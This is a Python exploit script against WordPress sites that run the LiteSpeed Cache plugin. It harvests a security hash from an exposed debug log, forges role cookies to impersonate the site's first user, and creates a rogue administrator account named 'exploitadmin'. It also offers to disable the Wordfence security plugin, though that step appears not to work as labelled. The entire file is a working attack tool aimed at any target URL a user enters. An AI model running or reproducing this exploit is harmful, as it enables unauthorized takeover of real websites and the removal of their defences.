exploit.py

import requests
import os

def trigger_hash_generation(target_url):
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
    params = {
        "action": "async_litespeed",
        "litespeed_type": "crawler"
    }
    
    response = requests.get(ajax_url, params=params)
    if response.status_code == 200:
        print("Hash generation triggered.")
    else:
        print(f"Failed to trigger hash generation: {response.status_code}")

def retrieve_correct_hash(target_url):
    log_url = f"{target_url}/wp-content/debug.log"
    response = requests.get(log_url)
    
    if response.status_code == 200:
        log_content = response.text
        print("Retrieved debug log content.")
        
        for line in log_content.splitlines():
            if "hash not match" in line:
                correct_hash = line.split(" != ")[-1].strip()
                print(f"Correct hash found: {correct_hash}")
                return correct_hash
    else:
        print("Failed to retrieve the debug log or debug log is not accessible.")
    return None

def create_admin_user(target_url, correct_hash, admin_user_id=1):
    payload = {
        "username": "exploitadmin",
        "password": "Secure*Pass123",
        "email": "admin@exploit.com",
        "roles": ["administrator"]
    }
    
    headers = {
        "Accept": "*/*",
        "User-Agent": "Mozilla/5.0",
        "Cookie": f"litespeed_role={admin_user_id}; litespeed_hash={correct_hash}",
        "Content-Type": "application/json"
    }
    
    response = requests.post(f"{target_url}/wp-json/wp/v2/users", json=payload, headers=headers)
    
    if response.status_code == 201:
        print("Admin user created successfully.")
    else:
        print(f"Failed to create admin user: {response.status_code}")

def deactivate_wordfence(target_url, correct_hash, admin_user_id=1):
    payload = {
        "action": "update-plugin",
        "plugin": "wordfence/wordfence.php"
    }
    
    headers = {
        "Accept": "*/*",
        "User-Agent": "Mozilla/5.0",
        "Cookie": f"litespeed_role={admin_user_id}; litespeed_hash={correct_hash}",
        "Content-Type": "application/json"
    }
    
    response = requests.post(f"{target_url}/wp-admin/admin-ajax.php", data=payload, headers=headers)
    
    if response.status_code == 200:
        print("Wordfence deactivated successfully.")
    else:
        print(f"Failed to deactivate Wordfence: {response.status_code}")

target_url = input("Enter the target website URL (e.g., https://example.com): ").strip()

if not target_url.startswith("http://") and not target_url.startswith("https://"):
    target_url = "http://" + target_url

trigger_hash_generation(target_url)
correct_hash = retrieve_correct_hash(target_url)
if correct_hash:
    create_admin_user(target_url, correct_hash)
    
    deactivate = input("Do you want to deactivate Wordfence? (yes/no): ").strip().lower()
    if deactivate == "yes":
        deactivate_wordfence(target_url, correct_hash)
    else:
        print("Wordfence was not deactivated.")